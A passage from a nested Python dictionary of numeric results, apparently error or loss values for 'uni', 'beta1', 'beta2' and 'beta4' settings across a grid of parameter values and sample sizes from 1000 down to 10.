'beta1': 0.029124281889602723, 'beta2': 0.4721222552275545, 'beta4': [0.021756365768324605, 1.3290924202376428]}, 200: {'uni': 0.12905012210969638, 'beta1': 0.02094718575899271, 'beta2': 0.47904864964482474, 'beta4': [0.022053897791131153, 1.2965456498187415]}, 150: {'uni': 0.11436257112395143, 'beta1': 0.027233016603507326, 'beta2': 0.505711169362763, 'beta4': [0.018463812410358174, 1.296183093117874]}, 100: {'uni': 0.1207577987530685, 'beta1': 0.03071522925704068, 'beta2': 0.477800710856348, 'beta4': [0.024519964931620897, 1.275243559696543]}, 75: {'uni': 0.19331469072257756, 'beta1': 0.02696019246477948, 'beta2': 0.5161607373371395, 'beta4': [0.026456646897275147, 1.2178304835805245]}, 50: {'uni': 0.2191415739843373, 'beta1': 0.06910385300920173, 'beta2': 0.5324442515990134, 'beta4': [0.03663912620751329, 1.1950430051511647]}, 30: {'uni': 0.27736623923689757, 'beta1': 0.15478071905259447, 'beta2': 0.6146633897712037, 'beta4': [0.05959673655496849, 1.1665156813618243]}, 20: {'uni': 0.40196115583372394, 'beta1': 0.2862799604210803, 'beta2': 0.6607899949419531, 'beta4': [0.0746458492423967, 1.1291374980340438]}, 10: {'uni': 0.6470479117720613, 'beta1': 0.5267194757051761, 'beta2': 0.8293978979725132, 'beta4': [0.13187127875511187, 1.1065295182068606]}}, 75: {1000: {'uni': 0.1515786966922324, 'beta1': 0.04592846518156684, 'beta2': 0.49675994638091236, 'beta4': [0.025848246678429294, 1.4979277518131913]}, 750: {'uni': 0.1359250794409579, 'beta1': 0.06269301788506419, 'beta2': 0.5300280831252744, 'beta4': [0.03172730420284062, 1.5582769770959521]}, 500: {'uni': 0.1489293835461733, 'beta1': 0.03758607283821415, 'beta2': 0.5591068809725539, 'beta4': [0.0290073547842622, 1.5015503418584653]}, 400: {'uni': 0.1620614533244523, 'beta1': 0.05170070240507436, 'beta2': 0.5319186060243111, 'beta4': [0.03172398797428782, 1.493476350917158]}, 300: {'uni': 0.17057859098038355, 'beta1': 0.04058586637229189, 'beta2': 0.6618855931935482, 'beta4': [0.023707512357693854, 1.5208629132217224]}, 200: {'uni': 0.16919617696560252, 'beta1': 0.044511575340384274, 'beta2': 0.5604502346566455, 'beta4': [0.023421519588066396, 1.376070096376646]}, 150: {'uni': 0.16038601440082725, 'beta1': 0.04466704954413228, 'beta2': 0.5364478230042707, 'beta4': [0.02269054266192888, 1.3659137244555777]}, 100: {'uni': 0.16697780890015043, 'beta1': 0.05780266344429386, 'beta2': 0.6598988497330642, 'beta4': [0.02269683312496209, 1.3064106529050417]}, 75: {'uni': 0.18936779659288844, 'beta1': 0.0528588404071561, 'beta2': 0.5024015892218546, 'beta4': [0.02722661600125422, 1.2880066034829047]}, 50: {'uni': 0.23900875770128244, 'beta1': 0.08314836009999102, 'beta2': 0.7316807298861019, 'beta4': [0.0378678387401122, 1.244366535166112]}, 30: {'uni': 0.3386998692888889, 'beta1': 0.17154505920663973, 'beta2': 0.5992798646163214, 'beta4': [0.04917302283275163, 1.194126104878338]}, 20: {'uni': 0.39792219959430253, 'beta1': 0.2815541940784873, 'beta2': 0.747900941602933, 'beta4': [0.07551408684570264, 1.1705837460113553]}, 10: {'uni': 0.7085450643682678, 'beta1': 0.557285657062697, 'beta2': 0.7923738502247967, 'beta4': [0.12363410621488621, 1.1294702859709835]}}, 50: {1000: {'uni': 0.23388680552857205, 'beta1': 0.13013243901878963, 'beta2': 0.6069060830560372, 'beta4': [0.04117425543950271, 1.726982497483725]}, 750: {'uni': 0.3342542025053256, 'beta1': 0.09407677111881815, 'beta2': 0.6556558666300236, 'beta4': [0.04155147758863826, 1.6460758790319159]}, 500: {'uni': 0.2617400572920262, 'beta1': 0.08307527401736141, 'beta2': 0.913211655734957, 'beta4': [0.03865102052127645, 1.674268391357043]}, 400: {'uni': 0.2336538445225923, 'beta1': 0.0909012667517591, 'beta2': 0.6047353172470049, 'beta4': [0.040143198002047804, 1.6326149671287367]}, 300: {'uni': 0.23389869183851916, 'beta1': 0.08029673340728087, 'beta2': 0.7026588056699414, 'beta4': [0.03965227169879199, 1.5907846517974022]}, 200: {'uni': 0.24968943018733125, 'beta1': 0.08712704367432451, 'beta2': 0.6937256962543127, 'beta4': [0.03710393937932573, 1.5913617461424383]}, 150: {'uni': 0.2129598307100895, 'beta1': 0.08626171616487283, 'beta2': 0.6701299168130738, 'beta4': [0.04222205851236509, 1.4852236379671524]}, 100: {'uni': 0.294268810869127, 'beta1': 0.09392120576589265, 'beta2': 0.6588802567689228, 'beta4': [0.03189977184975169, 1.479025526521639]}, 75: {'uni': 0.20370496994007078, 'beta1': 0.08620506713922738, 'beta2': 0.8834851122792289, 'beta4': [0.0319486848668279, 1.5309361694540307]}, 50: {'uni': 0.26087340026827105, 'beta1': 0.08395940396348044, 'beta2': 0.9159051514594372, 'beta4': [0.039168451848731425, 1.383841945680644]}, 30: {'uni': 0.3325714781963125, 'beta1': 0.15878413600643707, 'beta2': 0.8205263409406076, 'beta4': [0.04978681556769162, 1.3087756883985266]}, 20: {'uni': 0.42221900278176994, 'beta1': 0.22043433453119662, 'beta2': 0.7218703048306292, 'beta4': [0.07200305013037528, 1.2953604206103195]}, 10: {'uni': 0.7118146005654853, 'beta1': 0.5550103219492982, 'beta2': 0.8332806436554525, 'beta4': [0.11416986569421834, 1.192908742724074]}}, 30: {1000: {'uni': 0.39344771901594, 'beta1': 0.20706826216296173, 'beta2': 1.0378238557282666, 'beta4': [0.06402478683767453, 2.0914805409739223]}, 750: {'uni': 0.39030540148633164, 'beta1': 0.2198275946592076, 'beta2': 0.8834133901640486, 'beta4': [0.06307415740510106, 2.6350773192000805]}, 500: {'uni': 0.41888410414718413, 'beta1': 0.23122088686383846, 'beta2': 0.9340881005678076, 'beta4': [0.07167461301839322, 1.9609099596987858]}, 400: {'uni': 0.3377834589368441, 'beta1': 0.29762769921415416, 'beta2': 0.9285193846147385, 'beta4': [0.07390554519418496, 2.0702923109061]}, 300: {'uni': 0.6212256230961715, 'beta1': 0.2304534632287249, 'beta2': 0.9311442743499334, 'beta4': [0.0811370567517077, 1.8612702544609139]}, 200: {'uni': 0.40692874449521754, 'beta1': 0.2118536070891281, 'beta2': 0.8911524179154159, 'beta4': [0.068806307218875, 2.171137352139534]}, 150: {'uni': 0.39609796269299596, 'beta1': 0.20321160515473333, 'beta2': 0.9669393676536236, 'beta4': [0.07734188357043241, 2.0488754578525183]}, 100: {'uni': 0.47772960467285025, 'beta1': 0.23955521840544636, 'beta2': 1.093114783205816, 'beta4': [0.05647999347792319, 1.819279948595649]}, 75: {'uni': 0.49459915760994133, 'beta1': 0.7483228974591984, 'beta2': 1.0654241514219611, 'beta4': [0.05644331173725911, 1.8741005355316103]}, 50: {'uni': 0.4331535731141004, 'beta1': 0.23066294747587374, 'beta2': 1.045610584576763, 'beta4': [0.07252811484011165, 1.7866575621465575]}, 30: {'uni': 0.46993365210460936, 'beta1': 0.21062378826486575, 'beta2': 0.8982216898416053, 'beta4': [0.06060427283519371, 1.5645153212622234]}, 20: {'uni': 0.4600252576437871, 'beta1': 0.2996794531583841, 'beta2': 1.0103881743096814, 'beta4': [0.07026605480971959, 1.4899469734392818]}, 10: {'uni': 0.6594503348248166, 'beta1': 0.6052142478169568, 'beta2': 0.9869014312815094, 'beta4': [0.13715957666261736, 1.4056236673782823]}}, 20: {1000: {'uni': 0.7214489274861283, 'beta1': 0.7109602540608293, 'beta2': 1.4891565362913541, 'beta4': [0.10993312172398585, 2.4810788188995145]}, 750: {'uni': 0.8741829459110129, 'beta1': 0.6454387408943474, 'beta2': 1.3967706446447408, 'beta4': [0.10004324893926338, 2.22889028771558]}, 500: {'uni': 0.7729649834330807, 'beta1': 0.6947447893498436, 'beta2': 1.6680333781865306, 'beta4': [0.09859672804685067, 2.3474935663134167]}, 400: {'uni': 0.8037659477540411, 'beta1': 0.7015941173311855, 'beta2': 1.2339541081317063, 'beta4': [0.09169952977240271, 2.3104115893066273]}, 300: {'uni': 0.7479852286057033, 'beta1': 0.5048924805863739, 'beta2': 1.2057595986711336, 'beta4': [0.09546498930528277, 2.5352386394449127]}, 200: {'uni': 0.6052348664014313, 'beta1': 0.6718924234071889, 'beta2': 1.365705564221558, 'beta4': [0.1041836789818561, 2.4944754731499743]}, 150: {'uni': 0.7688254742087617, 'beta1': 0.6261770101829472, 'beta2': 1.2884360012787288, 'beta4': [0.09317440733924622, 2.4938849555699267]}, 100: {'uni': 0.71957651254854, 'beta1': 0.783943623581165, 'beta2': 1.1750563274777475, 'beta4': [0.07906754869135671, 2.611732685956283]}, 75: {'uni': 0.7212663908569285, 'beta1': 0.7491438048083165, 'beta2': 1.278401781969983, 'beta4': [0.09482530961721904, 2.314169022600685]}, 50: {'uni': 0.6513534744070623, 'beta1': 0.4853982257852653, 'beta2': 1.2421157076252283, 'beta4': [0.09218054510962954, 2.1348513584225044]}, 30: {'uni': 0.6801650950857789, 'beta1': 0.4735199294026357, 'beta2': 1.1720266455494714, 'beta4': [0.08458494028243027, 1.9719368906208312]}, 20: {'uni': 0.7808504905420437, 'beta1': 0.8855164069561684, 'beta2': 1.687205161553261, 'beta4': [0.07993917695329548, 2.018904621369056]}, 10: {'uni': 0.9041310834722268, 'beta1': 0.7158435630266999, 'beta2': 1.441125642826424, 'beta4': [0.13713575135187742, 1.6132607653419426]}}, 10: {1000: {'uni': 2.291865093409438, 'beta1': 3.796391956407082, 'beta2': 3.1343136686310404, 'beta4': [0.16591181945616454, 3.906378172009109]}, 750: {'uni': 2.06579510564522, 'beta1': 2.171132303701963, 'beta2': 2.43170413233102, 'beta4': [0.1714184982061991, 3.769544241401269]}, 500: {'uni': 1.7971825445298801, 'beta1': 2.8958816024514253, 'beta2': 2.3653595606869926, 'beta4': [0.20241339836195862, 4.077588626656164]}, 400: {'uni': 2.9424629521344974, 'beta1': 2.175911759881622, 'beta2': 2.604315847454542, 'beta4': [0.16266017066247487, 3.922604522260496]}, 300: {'uni': 1.9501226945273409, 'beta1': 3.782840007260135, 'beta2': 2.4106789863691453, 'beta4': [0.19330939984065848, 3.9702653485690873]}, 200: {'uni': 1.9928797910462663, 'beta1': 2.544676640580035, 'beta2': 2.818092333476372, 'beta4': [0.19321946623916747, 4.280267345101734]}, 150: {'uni': 2.6518203037821433, 'beta1': 2.6301937163774207, 'beta2': 2.662964550514325, 'beta4': [0.21170321149282043, 3.556982875367642]}, 100: {'uni': 2.899996349799425, 'beta1': 4.938592490365132, 'beta2': 3.2946845207767494, 'beta4': [0.20970024710748755, 4.918212312376091]}, 75: {'uni': 2.2712541486054723, 'beta1': 3.6115973476133356, 'beta2': 2.662909535043666, 'beta4': [0.19697867293373564, 3.6544730606284994]}, 50: {'uni': 1.8507652388899076, 'beta1': 2.535719173511266, 'beta2': 3.4567115555436216, 'beta4': [0.18431463594573702, 3.8942424792269956]}, 30: {'uni': 2.259855972095226, 'beta1': 2.507575552707849, 'beta2': 3.206096601185821, 'beta4': [0.1930477272227709, 2.9865306063349633]}, 20: {'uni': 3.323417704391435, 'beta1': 2.0495630344146014, 'beta2': 3.725865413632031, 'beta4': [0.1591708091618429, 4.0725701537088925]}, 10: {'uni': 2.683590243185979, 'beta1': 2.5526577443663645, 'beta2': 3.2041752255912126, 'beta4': [0.15035404637826302, 3.3085549636814515]}}}, 0.001: {1000: {1000: {'uni': 0.013537109538788296, 'beta1': 0.0004418669610901742, 'beta2': 0.2697608014805966, 'beta4': [0.0020188419600072316, 1.0765969581860098]}, 750: {'uni': 0.015518737693553651, 'beta1': 0.0004474752413131278, 'beta2': 0.3049834574567616, 'beta4': [0.002928484716195256, 1.0723749161682772]}, 500: {'uni': 0.025492576200161737, 'beta1': 0.00126278309841898, 'beta2': 0.2947895955099542, 'beta4': [0.004139147290479029, 1.06380419459373]}, 400: {'uni': 0.027388914557718014, 'beta1': 0.0017858676691235038, 'beta2': 0.2940695060349895, 'beta4': [0.004940725691007278, 1.0646782930881278]}, 300: {'uni': 0.043679103650868634, 'beta1': 0.004146600715111695, 'beta2': 0.3221074594010006, 'beta4': [0.0058809014285304325, 1.05171679158162]}, 200: {'uni': 0.055850905773996797, 'beta1': 0.012286663899209264, 'beta2': 0.35495235902886635, 'beta4': [0.011747346538206456, 1.0444923375059274]}, 150: {'uni': 0.07571408794730279, 'beta1': 0.00999545083178083, 'beta2': 0.39339731864243854, 'beta4': [0.015654464010031004, 1.04119667050509]}, 100: {'uni': 0.12878417183859997, 'beta1': 0.02319251025329732, 'beta2': 0.42206919367400175, 'beta4': [0.02605154363623979, 1.032808860624055]}, 75: {'uni': 0.17671912769998804, 'beta1': 0.04651753009023005, 'beta2': 0.48290210890860846, 'beta4': [0.02542438975055508, 1.028587880357103]}, 50: {'uni': 0.2080017791039395, 'beta1': 0.09510052489274758, 'beta2': 0.5532686352849299, 'beta4': [0.04866446156086449, 1.024036289107115]}, 30: {'uni': 0.37174873647872525, 'beta1': 0.1763556838455918, 'beta2': 0.6073687185809629, 'beta4': [0.06065616138133705, 1.0204732817389364]}, 20: {'uni': 0.4706009281641317, 'beta1': 0.4172241498005575, 'beta2': 0.7267012642157473, 'beta4': [0.0878371580829132, 1.016042382017103]}, 10: {'uni': 0.6884462251280654, 'beta1': 0.6504310410056453, 'beta2': 0.8578616568198645, 'beta4': [0.17123050769669146, 1.0114288240221012]}}, 750: {1000: {'uni': 0.014032662653447249, 'beta1': 0.0004197603947433533, 'beta2': 0.3224155552733178, 'beta4': [0.0025877927402001293, 1.0992758471396775]}, 750: {'uni': 0.017656930734368415, 'beta1': 0.0006179708996352925, 'beta2': 0.32112678688815993, 'beta4': [0.0027850509560516695, 1.0896392012982408]}, 500: {'uni': 0.022487140809604803, 'beta1': 0.0015712340706562924, 'beta2': 0.306535854228737, 'beta4': [0.0036538931964645595, 1.0768857039245323]}, 400: {'uni': 0.02931711450909471, 'beta1': 0.0015953956989447965, 'beta2': 0.2940021793382613, 'beta4': [0.004512162746165237, 1.0787914212103158]}, 300: {'uni': 0.03797549613105823, 'beta1': 0.004238318530411427, 'beta2': 0.31851063220054193, 'beta4': [0.0070433871318897785, 1.0709324943449523]}, 200: {'uni': 0.0672635192185687, 'beta1': 0.01475666235800533, 'beta2': 0.36095052393035215, 'beta4': [0.010745748507439314, 1.060093775811335]}, 150: {'uni': 0.0782012161107774, 'beta1': 0.012171034981107647, 'beta2': 0.3989466015618546, 'beta4': [0.012275235549252002, 1.055035316087489]}, 100: {'uni': 0.1111671462254427, 'beta1': 0.03504805392658513, 'beta2': 0.4399388718825932, 'beta4': [0.023290484838746617, 1.0414289777455785]}, 75: {'uni': 0.1467229116392003, 'beta1': 0.03154826354242117, 'beta2': 0.46545805237237575, 'beta4': [0.027567286039267083, 1.0413459531642508]}, 50: {'uni': 0.23242853631519125, 'beta1': 0.08764681410239905, 'beta2': 0.5282997805478701, 'beta4': [0.043790203869254855, 1.0312059461852012]}, 30: {'uni': 0.33478090270484767, 'beta1': 0.19986746017417012, 'beta2': 0.6464281529320948, 'beta4': [0.06216169944957162, 1.024300820754563]}, 20: {'uni': 0.46625228103566874, 'beta1': 0.3352913882162956, 'beta2': 0.7546236949727922, 'beta4': [0.07899091129224035, 1.021045206512229]}, 10: {'uni': 0.7532461209078295, 'beta1': 0.6554865690700844, 'beta2': 0.8689473621561907, 'beta4': [0.15450554655293974, 1.0158420905223018]}}, 500: {1000: {'uni': 0.02208336031576062, 'beta1': 0.0012806271939282098, 'beta2': 0.30491792281941166, 'beta4': [0.004154369009543563, 1.1291796536550491]}, 750: {'uni': 0.0249788378175696, 'beta1': 0.0010797670073452693, 'beta2': 0.34597268013437205, 'beta4': [0.0035547566741248944, 1.145887504602334]}, 500: {'uni': 0.03156864097576366, 'beta1': 0.001878931149848406, 'beta2': 0.33555105256994455, 'beta4': [0.004045741246069753, 1.1111524120461513]}, 400: {'uni': 0.02964039049766577, 'beta1': 0.0028752475332747426, 'beta2': 0.3189895492462362, 'beta4': [0.004475496924442904, 1.0985004462671362]}, 300: {'uni': 0.04054286140926675, 'beta1': 0.0030530447014601707, 'beta2': 0.33602501575095534, 'beta4': [0.005807153069867216, 1.089948008106302]}, 200: {'uni': 0.06368154738558036, 'beta1': 0.009413172181526356, 'beta2': 0.35093318039296945, 'beta4': [0.010128392991850291, 1.0749455354962245]}, 150: {'uni': 0.08560979711191868, 'beta1': 0.01814400620954622, 'beta2': 0.3817391631518634, 'beta4': [0.012693849833483756, 1.0766956230098896]}, 100: {'uni': 0.11065760228804478, 'beta1': 0.031931499364947796, 'beta2': 0.42393584933219425, 'beta4': [0.019711926476868896, 1.074086162181026]}, 75: {'uni': 0.13814860825841252, 'beta1': 0.047161838474747725, 'beta2': 0.461454606486388, 'beta4': [0.026718709086169346, 1.0529062226093644]}, 50: {'uni': 0.2924729124618689, 'beta1': 0.08356191139025354, 'beta2': 0.5416545481337098, 'beta4': [0.048513803361591896, 1.047349564419994]}, 30: {'uni': 0.38994864567008714, 'beta1': 0.21557372764244884, 'beta2': 0.6108965479787709, 'beta4': [0.059368500830894747, 1.0431355252713714]}, 20: {'uni': 0.42393809596014487, 'beta1': 0.38044506197760547, 'beta2': 0.7206816523302737, 'beta4': [0.08428835003718527, 1.0344086832398853]}, 10: {'uni': 0.7381591918995368, 'beta1': 0.6448622984694605, 'beta2': 0.8475866078699237, 'beta4': [0.16783106781496734, 1.0239303365728043]}}, 400: {1000: {'uni': 0.027326134080412047, 'beta1': 0.0015489118053178246, 'beta2': 0.3257531838269524, 'beta4': [0.004363329218823618, 1.157047980101011]}, 750: {'uni': 0.03269613683176431, 'beta1': 0.00237347642961547, 'beta2': 0.3765112398224541, 'beta4': [0.0044084255091659495, 1.1515364706106115]}, 500: {'uni': 0.02829267608816353, 'beta1': 0.002113478462779276, 'beta2': 0.3699445800604303, 'beta4': [0.005062501969303326, 1.128564031724105]}, 400: {'uni': 0.02982284964668319, 'beta1': 0.0018557251431091941, 'beta2': 0.30418237177038493, 'beta4': [0.0055468098705524094, 1.124759552937044]}, 300: {'uni': 0.03633810592372252, 'beta1': 0.003329752124641255, 'beta2': 0.34503158449761623, 'beta4': [0.00764574873689276, 1.1336601117649365]}, 200: {'uni': 0.0618643630393636, 'beta1': 0.006239455946425697, 'beta2': 0.3893580111719922, 'beta4': [0.008740016065982145, 1.0944415138600063]}, 150: {'uni': 0.08290995558988935, 'beta1': 0.01485769035028909, 'beta2': 0.3895851178723324, 'beta4': [0.014543995199215603, 1.0911947267214124]}, 100: {'uni': 0.12733784071357707, 'beta1': 0.041792640842624705, 'beta2': 0.4170065697291755, 'beta4': [0.019429522082070005, 1.0836887858094717]}, 75: {'uni': 0.1639703758168183, 'beta1': 0.05486987789272019, 'beta2': 0.5020845124417863, 'beta4': [0.02454441092459795, 1.0759262870830304]}, 50: {'uni': 0.2228830962075744, 'beta1': 0.11564754038475192, 'beta2': 0.5212091861747059, 'beta4': [0.047308183312444844, 1.0664568311962506]}, 30: {'uni': 0.3351992860790609, 'beta1': 0.16191267408494092, 'beta2': 0.5937982222349889, 'beta4': [0.06569858803208886, 1.0505472791656445]}, 20: {'uni': 0.5450729893841108, 'beta1': 0.43098366097308594, 'beta2': 0.6960946521774166, 'beta4': [0.08068269657512149, 1.0390693056594573]}, 10: {'uni': 0.7538652232296545, 'beta1': 0.7065202410569426, 'beta2': 0.8402242155683589, 'beta4': [0.15938925995624306, 1.0282263365830497]}}, 300: {1000: {'uni': 0.03623155105790878, 'beta1': 0.0025522247554552115, 'beta2': 0.3467467563959175, 'beta4': [0.007027836875807712, 1.1966502929456388]}, 750: {'uni': 0.0313950547463441, 'beta1': 0.004694441216264605, 'beta2': 0.36722656659770836, 'beta4': [0.0058771168613729555, 1.2034970232663906]}, 500: {'uni': 0.03539489610897603, 'beta1': 0.002663434080378617, 'beta2': 0.36331720497958425, 'beta4': [0.0064603241919073545, 1.1620579992997444]}, 400: {'uni': 0.0351254278473425, 'beta1': 0.00461414127398557, 'beta2': 0.3277459584398935, 'beta4': [0.0068608047998020005, 1.1704067166884702]}, 300: {'uni': 0.03980018699125466, 'beta1': 0.0054655033491287745, 'beta2': 0.3584428215881965, 'beta4': [0.005844562969263582, 1.1451011317868725]}, 200: {'uni': 0.05520695836413316, 'beta1': 0.00648381893317757, 'beta2': 0.38261363002766086, 'beta4': [0.009080285192231337, 1.1358137946469902]}, 150: {'uni': 0.09585002315832265, 'beta1': 0.014666160900098158, 'beta2': 0.3965763572228682, 'beta4': [0.01591317956737841, 1.1209589256111785]}, 100: {'uni': 0.1127142711948545, 'beta1': 0.02363531926273754, 'beta2': 0.45212575945962213, 'beta4': [0.02048277594290429, 1.1031644566986183]}, 75: {'uni': 0.14797467282265053, 'beta1': 0.03809387628580308, 'beta2': 0.4591848632040782, 'beta4': [0.03180981588767595, 1.1063373896373865]}, 50: {'uni': 0.2254379372771143, 'beta1': 0.09345713137258113, 'beta2': 0.5001164965271707, 'beta4': [0.04261601974244967, 1.0797165368273711]}, 30: {'uni': 0.40093684330112, 'beta1': 0.18938608352195094, 'beta2': 0.665032310636, 'beta4': [0.06012863762712923, 1.0658667444693248]}, 20: {'uni': 0.4942285112700853, 'beta1': 0.2885547182303252, 'beta2': 0.6595791693752406, 'beta4': [0.08745746042355958, 1.0536053485041785]}, 10: {'uni': 0.7190345596593238, 'beta1': 0.6651211105848184, 'beta2': 0.826925122122391, 'beta4': [0.16051646670948755, 1.0471478131384455]}}, 200: {1000: {'uni': 0.060057793651372704, 'beta1': 0.006187938996693969, 'beta2': 0.36736477572277093, 'beta4': [0.009293227645305487, 1.267681265906244]}, 750: {'uni': 0.06046594852805391, 'beta1': 0.006509051778350212, 'beta2': 0.41313052787178256, 'beta4': [0.01142723790937598, 1.2309014344313365]}, 500: {'uni': 0.0740362005188402, 'beta1': 0.00849682830778454, 'beta2': 0.3818697598614397, 'beta4': [0.00942075185210953, 1.277912461458182]}, 400: {'uni': 0.04917940985082775, 'beta1': 0.0073151839179716694, 'beta2': 0.37681354718921994, 'beta4': [0.009762298223416793, 1.2374277805357872]}, 300: {'uni': 0.0509887818241694, 'beta1': 0.004721389267464698, 'beta2': 0.4137259989095081, 'beta4': [0.010709445552100886, 1.2195842345664258]}, 200: {'uni': 0.06092018198260521, 'beta1': 0.008126211311259117, 'beta2': 0.41377607585033904, 'beta4': [0.012552773795295888, 1.210814650871189]}, 150: {'uni': 0.08320861100830386, 'beta1': 0.010652599194381862, 'beta2': 0.410588921859252, 'beta4': [0.011377755543899413, 1.1605558296237972]}, 100: {'uni': 0.10647538233235196, 'beta1': 0.02675525864005623, 'beta2': 0.45027686602574685, 'beta4': [0.018774675358622005, 1.1425517213205887]}, 75: {'uni': 0.15075826113503984, 'beta1': 0.03812861351502258, 'beta2': 0.4821830000786633, 'beta4': [0.02588845495636567, 1.1460284931167872]}, 50: {'uni': 0.20748454934236824, 'beta1': 0.07956559814853244, 'beta2': 0.5318809243191449, 'beta4': [0.03400241330970483, 1.131144969956103]}, 30: {'uni': 0.39005891840591755, 'beta1': 0.23508768413194275, 'beta2': 0.604195019511204, 'beta4': [0.07300462632536944, 1.0968699306871237]}, 20: {'uni': 0.47961991346108024, 'beta1': 0.3378509422322994, 'beta2': 0.6949090618591872, 'beta4': [0.08435933637998484, 1.0861750985584178]}, 10: {'uni': 0.7493592487162126, 'beta1': 0.7082252135351613, 'beta2': 0.8233197764550338, 'beta4': [0.16360988217538464, 1.0590739421875983]}}, 150: {1000: {'uni': 0.07246512795587667, 'beta1': 0.00940509489365912, 'beta2': 0.3834121832843376, 'beta4': [0.012061154345627774, 1.346345368105395]}, 750: {'uni': 0.08333214979418102, 'beta1': 0.012019314225734089, 'beta2': 0.41354718085794745, 'beta4': [0.013617336072865511, 1.317803333864672]}, 500: {'uni': 0.07223808071808703, 'beta1': 0.013444843438640032, 'beta2': 0.500497170757918, 'beta4': [0.013732312336221736, 1.3566135025043116]}, 400: {'uni': 0.07412227863180197, 'beta1': 0.009173025234347465, 'beta2': 0.5218918631188576, 'beta4': [0.010646990872949938, 1.3275623997460937]}, 300: {'uni': 0.06027828499856449, 'beta1': 0.008588769483821677, 'beta2': 0.43303765653591175, 'beta4': [0.011001496083177107, 1.2709377624732103]}, 200: {'uni': 0.07740533698799229, 'beta1': 0.01596227776300425, 'beta2': 0.4393860829917456, 'beta4': [0.013707242813425027, 1.235336706709078]}, 150: {'uni': 0.09469289988283666, 'beta1': 0.018010566018472236, 'beta2': 0.46689138360128024, 'beta4': [0.015442744929322542, 1.22737373023355]}, 100: {'uni': 0.10537401955613016, 'beta1': 0.02559635095907498, 'beta2': 0.4483188526069417, 'beta4': [0.020984796579724598, 1.1917347765643078]}, 75: {'uni': 0.1741885047544234, 'beta1': 0.05029710897697464, 'beta2': 0.4832427754379396, 'beta4': [0.02508555719013275, 1.1877236315076742]}, 50: {'uni': 0.23513358008851837, 'beta1': 0.08821603551377359, 'beta2': 0.5410204067376275, 'beta4': [0.03945996719545313, 1.154311026803482]}, 30: {'uni': 0.32655423356767815, 'beta1': 0.23627137526479217, 'beta2': 0.612345924047393, 'beta4': [0.06279287244508759, 1.127521379517458]}, 20: {'uni': 0.43138609640559733, 'beta1': 0.36249312001735073, 'beta2': 0.6879736777963187, 'beta4': [0.11914662239936859, 1.1278478336983744]}, 10: {'uni': 0.7425459718118043, 'beta1': 0.6837968299663986, 'beta2': 0.8665605066074531, 'beta4': [0.1876384389463847, 1.083397954154307]}}, 100: {1000: {'uni': 0.1487676605580423, 'beta1': 0.02437792836645245, 'beta2': 0.49427790334163363, 'beta4': [0.01703482937216448, 1.399548399765302]}, 750: {'uni': 0.11310232265204254, 'beta1': 0.02524996032593586, 'beta2': 0.5217627256964408, 'beta4': [0.01698165245717892, 1.4406554008355783]}, 500: {'uni': 0.11717410083094586, 'beta1': 0.02618543909344974, 'beta2': 0.5383596952242804, 'beta4': [0.023983523561589164, 1.3929126361512172]}, 400: {'uni': 0.119738193458416, 'beta1': 0.02505658785977393, 'beta2': 0.5984167205074813, 'beta4': [0.01926970844980976, 1.4014605002976324]}, 300: {'uni': 0.12233230352897319, 'beta1': 0.030570949763671123, 'beta2': 0.5770761352544695, 'beta4': [0.019784253795192344, 1.4359356389798974]}, 200: {'uni': 0.12207409086081243, 'beta1': 0.02347263628756829, 'beta2': 0.5760897628554611, 'beta4': [0.019990281670087366, 1.3745371518250655]}, 150: {'uni': 0.10542026853254463, 'beta1': 0.02953081474765129, 'beta2': 0.5703573600080448, 'beta4': [0.01916862292541901, 1.2965599971106665]}, 100: {'uni': 0.12606340736638602, 'beta1': 0.029241858812173283, 'beta2': 0.520085462363208, 'beta4': [0.021680149967017056, 1.3380882439868846]}, 75: {'uni': 0.15289116139614062, 'beta1': 0.046818551423756204, 'beta2': 0.5234533249147212, 'beta4': [0.030541975508426033, 1.2737285592668153]}, 50: {'uni': 0.22295673863255383, 'beta1': 0.0777043578096471, 'beta2': 0.5277287922461552, 'beta4': [0.03463272718442295, 1.2507855959253786]}, 30: {'uni': 0.322701566594298, 'beta1': 0.20209878886640079, 'beta2': 0.6446393363434055, 'beta4': [0.057809443205279955, 1.183476927699967]}, 20: {'uni': 0.4881509697552908, 'beta1': 0.32634375809351596, 'beta2': 0.6555377865749321, 'beta4': [0.09881280421760813, 1.1859881340445586]}, 10: {'uni': 0.7185909063724639, 'beta1': 0.6708907363360799, 'beta2': 0.8168268424612932, 'beta4': [0.1552377656555602, 1.121004193526685]}}, 75: {1000: {'uni': 0.20283838067373647, 'beta1': 0.048429921987961456, 'beta2': 0.5254186618618247, 'beta4': [0.02716958040457032, 1.5310324208557173]}, 750: {'uni': 0.13649456208891103, 'beta1': 0.05990815130918355, 'beta2': 0.6143499171511568, 'beta4': [0.025247761507755824, 1.6218068004006065]}, 500: {'uni': 0.17357469505108555, 'beta1': 0.04911574923950298, 'beta2': 0.5392298327482756, 'beta4': [0.025313183659280477, 1.5098847201105141]}, 400: {'uni': 0.1696292678007163, 'beta1': 0.04567710550047028, 'beta2': 0.531791431252953, 'beta4': [0.02843317204287415, 1.511767668283802]}, 300: {'uni': 0.15649352627564092, 'beta1': 0.052458117800853014, 'beta2': 0.6238230721412571, 'beta4': [0.024980744864881454, 1.448139383334922]}, 200: {'uni': 0.16000482751565392, 'beta1': 0.04812942180105504, 'beta2': 0.6848305198014162, 'beta4': [0.026321896909384607, 1.3985133907539185]}, 150: {'uni': 0.21512892236445738, 'beta1': 0.04170656196537403, 'beta2': 0.6484101556394571, 'beta4': [0.028292107396516844, 1.4960535034185667]}, 100: {'uni': 0.17047052520864803, 'beta1': 0.04434589905934036, 'beta2': 0.6147353576676836, 'beta4': [0.031896789192913104, 1.395203205943251]}, 75: {'uni': 0.15498526288207984, 'beta1': 0.05584692512943298, 'beta2': 0.6237541924317974, 'beta4': [0.02517618697832332, 1.3245769159326284]}, 50: {'uni': 0.26311823368421094, 'beta1': 0.08632237956112145, 'beta2': 0.5711379680106714, 'beta4': [0.04746092000571327, 1.3617429879333032]}, 30: {'uni': 0.36091090034892204, 'beta1': 0.18600456221710257, 'beta2': 0.6048666597688582, 'beta4': [0.061077535669381317, 1.2677185233169856]}, 20: {'uni': 0.41610718889687526, 'beta1': 0.3481216835860471, 'beta2': 0.6823292535355998, 'beta4': [0.09228201110020866, 1.2376222120042897]}, 10: {'uni': 0.7381983047748464, 'beta1': 0.6931366409956315, 'beta2': 0.8379903854497059, 'beta4': [0.16766375232596248, 1.2030815682204685]}}, 50: {1000: {'uni': 0.30730495204502717, 'beta1': 0.12683774226991987, 'beta2': 0.758295652904777, 'beta4': [0.033995273995958114, 1.6538716994158296]}, 750: {'uni': 0.2748268412061488, 'beta1': 0.08382717056992495, 'beta2': 